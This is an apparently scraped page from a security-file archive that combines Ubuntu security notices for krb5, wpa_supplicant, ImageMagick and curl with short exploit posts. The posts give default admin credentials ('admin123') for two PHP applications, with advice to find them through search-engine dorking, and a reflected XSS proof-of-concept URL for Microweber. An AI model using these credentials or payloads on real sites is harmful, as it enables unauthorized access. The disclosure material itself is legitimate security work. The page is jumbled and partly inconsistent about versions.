   libkadm5srv-mit11               1.16-2ubuntu0.4+esm2  
                                   Available with Ubuntu Pro  
   libkdb5-9                       1.16-2ubuntu0.4+esm2  
                                   Available with Ubuntu Pro  
   libkrad0                        1.16-2ubuntu0.4+esm2  
                                   Available with Ubuntu Pro  
   libkrb5-3                       1.16-2ubuntu0.4+esm2  
                                   Available with Ubuntu Pro  
   libkrb5support0                 1.16-2ubuntu0.4+esm2  
                                   Available with Ubuntu Pro

Ubuntu 16.04 LTS  
   krb5-admin-server               1.13.2+dfsg-5ubuntu2.2+esm5  
                                   Available with Ubuntu Pro  
   krb5-kdc                        1.13.2+dfsg-5ubuntu2.2+esm5  
                                   Available with Ubuntu Pro  
   krb5-kdc-ldap                   1.13.2+dfsg-5ubuntu2.2+esm5  
                                   Available with Ubuntu Pro  
   krb5-otp                        1.13.2+dfsg-5ubuntu2.2+esm5  
                                   Available with Ubuntu Pro  
   krb5-pkinit                     1.13.2+dfsg-5ubuntu2.2+esm5  
                                   Available with Ubuntu Pro  
   krb5-user                       1.13.2+dfsg-5ubuntu2.2+esm5  
                                   Available with Ubuntu Pro  
   libgssapi-krb5-2                1.13.2+dfsg-5ubuntu2.2+esm5  
                                   Available with Ubuntu Pro  
   libgssrpc4                      1.13.2+dfsg-5ubuntu2.2+esm5  
                                   Available with Ubuntu Pro  
   libk5crypto3                    1.13.2+dfsg-5ubuntu2.2+esm5  
                                   Available with Ubuntu Pro  
   libkadm5clnt-mit9               1.13.2+dfsg-5ubuntu2.2+esm5  
                                   Available with Ubuntu Pro  
   libkadm5srv-mit9                1.13.2+dfsg-5ubuntu2.2+esm5  
                                   Available with Ubuntu Pro  
   libkdb5-8                       1.13.2+dfsg-5ubuntu2.2+esm5  
                                   Available with Ubuntu Pro  
   libkrad0                        1.13.2+dfsg-5ubuntu2.2+esm5  
                                   Available with Ubuntu Pro  
   libkrb5-3                       1.13.2+dfsg-5ubuntu2.2+esm5  
                                   Available with Ubuntu Pro  
   libkrb5support0                 1.13.2+dfsg-5ubuntu2.2+esm5  
                                   Available with Ubuntu Pro

Ubuntu 14.04 LTS  
   krb5-admin-server               1.12+dfsg-2ubuntu5.4+esm5  
                                   Available with Ubuntu Pro  
   krb5-kdc                        1.12+dfsg-2ubuntu5.4+esm5  
                                   Available with Ubuntu Pro  
   krb5-kdc-ldap                   1.12+dfsg-2ubuntu5.4+esm5  
                                   Available with Ubuntu Pro  
   krb5-otp                        1.12+dfsg-2ubuntu5.4+esm5  
                                   Available with Ubuntu Pro  
   krb5-pkinit                     1.12+dfsg-2ubuntu5.4+esm5  
                                   Available with Ubuntu Pro  
   krb5-user                       1.12+dfsg-2ubuntu5.4+esm5  
                                   Available with Ubuntu Pro  
   libgssapi-krb5-2                1.12+dfsg-2ubuntu5.4+esm5  
                                   Available with Ubuntu Pro  
   libgssrpc4                      1.12+dfsg-2ubuntu5.4+esm5  
                                   Available with Ubuntu Pro  
   libk5crypto3                    1.12+dfsg-2ubuntu5.4+esm5  
                                   Available with Ubuntu Pro  
   libkadm5clnt-mit9               1.12+dfsg-2ubuntu5.4+esm5  
                                   Available with Ubuntu Pro  
   libkadm5srv-mit8                1.12+dfsg-2ubuntu5.4+esm5  
                                   Available with Ubuntu Pro  
   libkadm5srv-mit9                1.12+dfsg-2ubuntu5.4+esm5  
                                   Available with Ubuntu Pro  
   libkdb5-7                       1.12+dfsg-2ubuntu5.4+esm5  
                                   Available with Ubuntu Pro  
   libkrad0                        1.12+dfsg-2ubuntu5.4+esm5  
                                   Available with Ubuntu Pro  
   libkrb5-3                       1.12+dfsg-2ubuntu5.4+esm5  
                                   Available with Ubuntu Pro  
   libkrb5support0                 1.12+dfsg-2ubuntu5.4+esm5  
                                   Available with Ubuntu Pro

In general, a standard system update will make all the necessary changes.

References:  
https://ubuntu.com/security/notices/USN-6947-1   
<https://ubuntu.com/security/notices/USN-6947-1>  
   CVE-2024-37370, CVE-2024-37371

Package Information:  
https://launchpad.net/ubuntu/+source/krb5/1.20.1-6ubuntu2.1   
<https://launchpad.net/ubuntu/+source/krb5/1.20.1-6ubuntu2.1>  
https://launchpad.net/ubuntu/+source/krb5/1.19.2-2ubuntu0.4   
<https://launchpad.net/ubuntu/+source/krb5/1.19.2-2ubuntu0.4>  
https://launchpad.net/ubuntu/+source/krb5/1.17-6ubuntu4.6   
<https://launchpad.net/ubuntu/+source/krb5/1.17-6ubuntu4.6>

Ubuntu Security Notice USN-6947-1

Ubuntu Security Notice 6945-1 - Rory McNamara discovered that wpa_supplicant could be made to load arbitrary shared objects by unprivileged users that have access to the control interface. An attacker could use this to escalate privileges to root.

==========================================================================  
Ubuntu Security Notice USN-6945-1  
August 06, 2024

wpa vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 LTS  
- Ubuntu 14.04 LTS

Summary:

wpa_supplicant could be made to run programs as an administrator with  
specially crafted configuration file.

Software Description:  
- wpa: client support for WPA and WPA2

Details:

Rory McNamara discovered that wpa_supplicant could be made to load  
arbitrary shared objects by unprivileged users that have access to  
the control interface. An attacker could use this to escalate privileges  
to root.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
   wpasupplicant                   2:2.10-21ubuntu0.1

Ubuntu 22.04 LTS  
   wpasupplicant                   2:2.10-6ubuntu2.1

Ubuntu 20.04 LTS  
   wpasupplicant                   2:2.9-1ubuntu4.4

Ubuntu 18.04 LTS  
   wpasupplicant                   2:2.6-15ubuntu2.8+esm1

Ubuntu 16.04 LTS  
   wpasupplicant                   2.4-0ubuntu6.8+esm1

Ubuntu 14.04 LTS  
   wpasupplicant                   2.1-0ubuntu1.7+esm5

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6945-1  
   CVE-2024-5290,https://launchpad.net/bugs/2067613

Package Information:  
   https://launchpad.net/ubuntu/+source/wpa/2:2.10-21ubuntu0.1  
   https://launchpad.net/ubuntu/+source/wpa/2:2.10-6ubuntu2.1  
   https://launchpad.net/ubuntu/+source/wpa/2:2.9-1ubuntu4.4  
   https://launchpad.net/ubuntu/+source/wpa/2:2.6-15ubuntu2.8+esm1  
   https://launchpad.net/ubuntu/+source/wpa/2.4-0ubuntu6.8+esm1  
   https://launchpad.net/ubuntu/+source/wpa/2.1-0ubuntu1.7+esm5

Ubuntu Security Notice USN-6945-1

Covid-19 Directory on Vaccination System version 1.0 suffers from an ignored default credential vulnerability.

**Covid-19 Directory On Vaccination System 1.0 Insecure Settings**

Posted Aug 7, 2024

Authored by indoushka

Covid-19 Directory on Vaccination System version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 8c38f4e680e6513d62d4303a51a4d7e3eaa5a7bb80e3e87ce8e510bba268a0b9

Download | Favorite | View

**Covid-19 Directory On Vaccination System 1.0 Insecure Settings**

    ====================================================================================================================================| # Title     : Covid-19 Directory on Vaccination System v1.0 Insecure Settings Vulnerability                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://www.sourcecodester.com/php/15244/design-and-implementation-covid-19-directory-vacination.html              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,289)
*   Arbitrary (16,852)
*   BBS (2,859)
*   Bypass (1,860)
*   CGI (1,033)
*   Code Execution (7,792)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,386)
*   DoS (25,050)
*   Encryption (2,389)
*   Exploit (53,137)
*   File Inclusion (4,259)
*   File Upload (990)
*   Firewall (822)
*   Info Disclosure (2,889)
*   Intrusion Detection (915)
*   Java (3,143)
*   JavaScript (896)
*   Kernel (7,191)
*   Local (14,791)
*   Magazine (586)
*   Overflow (13,167)
*   Perl (1,435)
*   PHP (5,222)
*   Proof of Concept (2,382)
*   Protocol (3,724)
*   Python (1,635)
*   Remote (31,646)
*   Root (3,635)
*   Rootkit (526)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,025)
*   Shell (3,273)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,275)
*   SQL Injection (16,605)
*   TCP (2,440)
*   Trojan (690)
*   UDP (904)
*   Virus (669)
*   Vulnerability (32,941)
*   Web (9,960)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,246)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,090)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,547)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,646)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,459)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,729)
*   UNIX (9,433)
*   UnixWare (187)
*   Windows (6,670)
*   Other

Covid-19 Directory On Vaccination System 1.0 Insecure Settings

Microweber version 1.0 suffers from a cross site scripting vulnerability in the search functionality. Original discovery of cross site scripting in this version is attributed to tmrswrr in June of 2024.

    # Exploit Title: Microweber <=v2.0.15 - Reflected Cross-Site Scripting (XSS)# Date: 16.07.2024# Exploit Author: Prerak Mittal# Vendor Homepage: https://microweber.org/# Software Link: https://github.com/microweber/microweber/releases/tag/v2.0.15# Version: <=v2.0.15# Tested on: Ubuntu 22.04# CVE : CVE-2024-40101# Description:## App Installation:1. Clone the repository and build the application using docker:```git clone -b v2.0.15 https://github.com/microweber/microweber.gitcd microweberdocker compose up -d```2. Visit http://localhost3. Follow along the UI installation process.## Steps to reproduce:1. Visit http://localhost/search2. Insert the below payload in `keywords` parameter:  "onscrollend=alert(1) style="display:block;overflow:auto;border:1px dashed;width:500px;height:100px;"  Complete Exploit URL: http://localhost/search?keywords=%22onscrollend=alert(1)%20style=%22display:block;overflow:auto;border:1px%20dashed;width:500px;height:100px;%22  3. Scroll any of the two `div` sections created on the search results page. Once the scroll finishes, it will trigger the alert popup.

Microweber 2.0.15 Cross Site Scripting

Computer Laboratory Management System version 1.0 suffers from an ignored default credential vulnerability.

**Computer Laboratory Management System 1.0 Insecure Settings**

Posted Aug 6, 2024

Authored by indoushka

Computer Laboratory Management System version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 903fb54e0bd8fb8efe43fdddb49a0f5abaa23ea96b8495e4f7c47b36636f9f0d

Download | Favorite | View

**Computer Laboratory Management System 1.0 Insecure Settings**

    =============================================================================================================================================| # Title     : Computer Laboratory Management System v1.0 Insecure Settings Vulnerability                                                  || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html#comment-104400      |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,255)
*   Arbitrary (16,849)
*   BBS (2,859)
*   Bypass (1,860)
*   CGI (1,033)
*   Code Execution (7,786)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,385)
*   DoS (25,039)
*   Encryption (2,389)
*   Exploit (53,128)
*   File Inclusion (4,258)
*   File Upload (990)
*   Firewall (822)
*   Info Disclosure (2,888)
*   Intrusion Detection (915)
*   Java (3,142)
*   JavaScript (896)
*   Kernel (7,188)
*   Local (14,791)
*   Magazine (586)
*   Overflow (13,166)
*   Perl (1,435)
*   PHP (5,221)
*   Proof of Concept (2,381)
*   Protocol (3,724)
*   Python (1,632)
*   Remote (31,643)
*   Root (3,633)
*   Rootkit (526)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,025)
*   Shell (3,273)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,275)
*   SQL Injection (16,604)
*   TCP (2,440)
*   Trojan (690)
*   UDP (904)
*   Virus (669)
*   Vulnerability (32,932)
*   Web (9,955)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,246)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,087)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,536)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,612)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,441)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,727)
*   UNIX (9,433)
*   UnixWare (187)
*   Windows (6,668)
*   Other

Computer Laboratory Management System 1.0 Insecure Settings

Ubuntu Security Notice 6200-2 - USN-6200-1 fixed vulnerabilities in ImageMagick. Unfortunately these fixes were incomplete for Ubuntu 20.04 LTS, and Ubuntu 22.04 LTS. This update fixes the problem.

==========================================================================  
Ubuntu Security Notice USN-6200-2  
July 25, 2024

imagemagick vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in ImageMagick.

Software Description:  
- imagemagick: Image manipulation programs and library

Details:

USN-6200-1 fixed vulnerabilities in ImageMagick. Unfortunately these fixes were  
incomplete for Ubuntu 20.04 LTS, and Ubuntu 22.04 LTS. This update fixes the  
problem.

Original advisory details:

 It was discovered that ImageMagick incorrectly handled the "-authenticate"  
 option for password-protected PDF files. An attacker could possibly use  
 this issue to inject additional shell commands and perform arbitrary code  
 execution. This issue only affected Ubuntu 20.04 LTS. (CVE-2020-29599)

  It was discovered that ImageMagick incorrectly handled certain values  
 when processing PDF files. If a user or automated system using ImageMagick  
 were tricked into opening a specially crafted PDF file, an attacker could  
 exploit this to cause a denial of service. This issue only affected Ubuntu  
 20.04 LTS. (CVE-2021-20224)

  Zhang Xiaohui discovered that ImageMagick incorrectly handled certain  
 values when processing image data. If a user or automated system using  
 ImageMagick were tricked into opening a specially crafted image, an  
 attacker could exploit this to cause a denial of service. This issue only  
 affected Ubuntu 20.04 LTS. (CVE-2021-20241, CVE-2021-20243)

  It was discovered that ImageMagick incorrectly handled certain values  
 when processing visual effects based image files. By tricking a user into  
 opening a specially crafted image file, an attacker could crash the  
 application causing a denial of service. This issue only affected Ubuntu  
 20.04 LTS. (CVE-2021-20244, CVE-2021-20309)

  It was discovered that ImageMagick incorrectly handled certain values  
 when performing resampling operations. By tricking a user into opening  
 a specially crafted image file, an attacker could crash the application  
 causing a denial of service. This issue only affected Ubuntu 20.04 LTS.  
 (CVE-2021-20246)

  It was discovered that ImageMagick incorrectly handled certain values  
 when processing thumbnail image data. By tricking a user into opening  
 a specially crafted image file, an attacker could crash the application  
 causing a denial of service. This issue only affected Ubuntu 20.04 LTS.  
 (CVE-2021-20312)

  It was discovered that ImageMagick incorrectly handled memory cleanup  
 when performing certain cryptographic operations. Under certain conditions  
 sensitive cryptographic information could be disclosed. This issue only  
 affected Ubuntu 20.04 LTS. (CVE-2021-20313)

  It was discovered that ImageMagick did not use the correct rights when  
 specifically excluded by a module policy. An attacker could use this issue  
 to read and write certain restricted files. This issue only affected Ubuntu  
 20.04 LTS. (CVE-2021-39212)

  It was discovered that ImageMagick incorrectly handled memory under certain  
 circumstances. If a user were tricked into opening a specially crafted  
 image file, an attacker could possibly exploit this issue to cause a denial  
 of service or other unspecified impact. This issue only affected Ubuntu  
 20.04 LTS. (CVE-2022-28463, CVE-2022-32545, CVE-2022-32546, CVE-2022-32547)

  It was discovered that ImageMagick incorrectly handled memory under certain  
 circumstances. If a user were tricked into opening a specially crafted  
 image file, an attacker could possibly exploit this issue to cause a denial  
 of service or other unspecified impact. This issue only affected Ubuntu  
 22.04 LTS, Ubuntu 22.10, and Ubuntu 23.04. (CVE-2021-3610, CVE-2023-1906,  
 CVE-2023-3428)

  It was discovered that ImageMagick incorrectly handled certain values  
 when processing specially crafted SVG files. By tricking a user into  
 opening a specially crafted SVG file, an attacker could crash the  
 application causing a denial of service. This issue only affected Ubuntu  
 20.04 LTS, Ubuntu 22.04 LTS, Ubuntu 22.10, and Ubuntu 23.04. (CVE-2023-1289)

  It was discovered that ImageMagick incorrectly handled memory under certain  
 circumstances. If a user were tricked into opening a specially crafted  
 tiff file, an attacker could possibly exploit this issue to cause a denial  
 of service or other unspecified impact. This issue only affected Ubuntu  
 22.04 LTS, Ubuntu 22.10, and Ubuntu 23.04. (CVE-2023-3195)

  It was discovered that ImageMagick incorrectly handled memory under certain  
 circumstances. If a user were tricked into opening a specially crafted  
 image file, an attacker could possibly exploit this issue to cause a denial  
 of service or other unspecified impact. (CVE-2023-34151)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS  
  imagemagick                     8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  imagemagick-6-common            8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  imagemagick-6.q16               8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  imagemagick-6.q16hdri           8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  imagemagick-common              8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libimage-magick-perl            8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libimage-magick-q16-perl        8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libimage-magick-q16hdri-perl    8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagick++-6-headers           8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagick++-6.q16-8             8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagick++-6.q16-dev           8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagick++-6.q16hdri-8         8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagick++-6.q16hdri-dev       8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagick++-dev                 8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagickcore-6-headers         8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagickcore-6.q16-6           8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagickcore-6.q16-dev         8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagickcore-6.q16hdri-6       8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagickcore-6.q16hdri-dev     8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagickcore-dev               8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagickwand-6-headers         8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagickwand-6.q16-6           8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagickwand-6.q16-dev         8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagickwand-6.q16hdri-6       8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagickwand-6.q16hdri-dev     8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagickwand-dev               8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  perlmagick                      8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5

Ubuntu 20.04 LTS  
  imagemagick                     8:6.9.10.23+dfsg-2.1ubuntu11.10  
  imagemagick-6-common            8:6.9.10.23+dfsg-2.1ubuntu11.10  
  imagemagick-6.q16               8:6.9.10.23+dfsg-2.1ubuntu11.10  
  imagemagick-6.q16hdri           8:6.9.10.23+dfsg-2.1ubuntu11.10  
  imagemagick-common              8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libimage-magick-perl            8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libimage-magick-q16-perl        8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libimage-magick-q16hdri-perl    8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagick++-6-headers           8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagick++-6.q16-8             8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagick++-6.q16-dev           8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagick++-6.q16hdri-8         8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagick++-6.q16hdri-dev       8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagick++-dev                 8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagickcore-6-headers         8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagickcore-6.q16-6           8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagickcore-6.q16-dev         8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagickcore-6.q16hdri-6       8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagickcore-6.q16hdri-dev     8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagickcore-dev               8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagickwand-6-headers         8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagickwand-6.q16-6           8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagickwand-6.q16-dev         8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagickwand-6.q16hdri-6       8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagickwand-6.q16hdri-dev     8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagickwand-dev               8:6.9.10.23+dfsg-2.1ubuntu11.10  
  perlmagick                      8:6.9.10.23+dfsg-2.1ubuntu11.10

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6200-2  
  https://ubuntu.com/security/notices/USN-6200-1  
  CVE-2023-1289, CVE-2023-34151

Package Information:  
  https://launchpad.net/ubuntu/+source/imagemagick/8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  https://launchpad.net/ubuntu/+source/imagemagick/8:6.9.10.23+dfsg-2.1ubuntu11.10

Ubuntu Security Notice USN-6200-2

Ubuntu Security Notice 6944-1 - Dov Murik discovered that curl incorrectly handled parsing ASN.1 Generalized Time fields. A remote attacker could use this issue to cause curl to crash, resulting in a denial of service, or possibly obtain sensitive memory contents.

    ==========================================================================Ubuntu Security Notice USN-6944-1August 05, 2024curl vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 24.04 LTS- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:curl could be made to crash or expose information if it received speciallycrafted network traffic.Software Description:- curl: HTTP, HTTPS, and FTP client and client librariesDetails:Dov Murik discovered that curl incorrectly handled parsing ASN.1Generalized Time fields. A remote attacker could use this issue to causecurl to crash, resulting in a denial of service, or possibly obtainsensitive memory contents.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 24.04 LTS   curl                            8.5.0-2ubuntu10.2   libcurl3t64-gnutls              8.5.0-2ubuntu10.2   libcurl4t64                     8.5.0-2ubuntu10.2Ubuntu 22.04 LTS   curl                            7.81.0-1ubuntu1.17   libcurl3-gnutls                 7.81.0-1ubuntu1.17   libcurl3-nss                    7.81.0-1ubuntu1.17   libcurl4                        7.81.0-1ubuntu1.17Ubuntu 20.04 LTS   curl                            7.68.0-1ubuntu2.23   libcurl3-gnutls                 7.68.0-1ubuntu2.23   libcurl3-nss                    7.68.0-1ubuntu2.23   libcurl4                        7.68.0-1ubuntu2.23In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6944-1   CVE-2024-7264Package Information:   https://launchpad.net/ubuntu/+source/curl/8.5.0-2ubuntu10.2   https://launchpad.net/ubuntu/+source/curl/7.81.0-1ubuntu1.17   https://launchpad.net/ubuntu/+source/curl/7.68.0-1ubuntu2.23

Tag

#ubuntu